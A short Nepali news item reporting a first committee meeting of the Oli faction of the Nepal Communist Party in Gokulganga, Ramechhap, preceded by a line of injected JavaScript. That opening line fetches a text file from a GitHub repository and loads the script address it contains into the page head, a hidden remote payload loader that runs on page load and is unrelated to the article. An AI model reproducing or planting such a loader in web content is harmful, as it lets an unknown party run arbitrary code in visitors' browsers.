;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
माघ १०,
रामेछाप । रामेछापको गोकुलगंगा गाउँपालिकामा नेपाल कम्युनिष्ट पार्टी (नेकपा) ओली समुहको पहिलो कमिटी बैठक तथा भेला शनिबार सम्पन्न भएको छ ।
दिपक कार्कीको अध्यक्षता र पार्टी केन्द्रीय सदस्य माधब ढुङ्गेलको प्रमुख आतिथ्यतामा कार्यक्रम भएको हो । विभिन्न नगरपालिका तथा गाउँपालिका केन्द्रीत कार्यक्रमलाई तिवृ पारेको सो समूहले शनिबार गोकुल गंगामा भेला गरेको हो । शुक्रबार रामेछाप नगरपालिकामा र गत बिहिबार उमाकुण्ड गाउँपालिकामा भेला गरेको थियो ।
शनिबार गोकुलगंगा गाउँपालिकामा भेला गरेको हो ।
फोटो हेर्नुहोस्
फोटो साभार फेस्बुक
फेसबुक प्रतिक्रियाहरु